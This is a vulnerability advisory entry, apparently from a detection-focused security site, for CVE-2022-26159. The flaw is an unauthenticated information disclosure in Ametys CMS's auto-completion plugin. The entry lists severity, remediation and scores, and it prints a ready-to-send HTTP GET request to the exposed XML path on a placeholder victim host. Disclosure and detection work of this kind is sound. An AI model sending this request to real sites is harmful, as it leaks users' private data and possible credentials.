🔙 목록으로 돌아가기

CVE-2022-26159: Ametys CMS Information Disclosure

TitleAmetys CMS Information Disclosure
AuthorRemi Gascou (podalirius)
SeverityMedium
ImpactThe vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration.
RemediationApply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS.
CVSS Score5.3
EPSS Score0.88594
CVE IDCVE-2022-26159
CWE IDCWE-425
Tags cve cve2022 plugin ametys cms vuln

🔍 Vulnerability Description

Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.

🌐 HTTP Request

GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-26159.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-26159.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A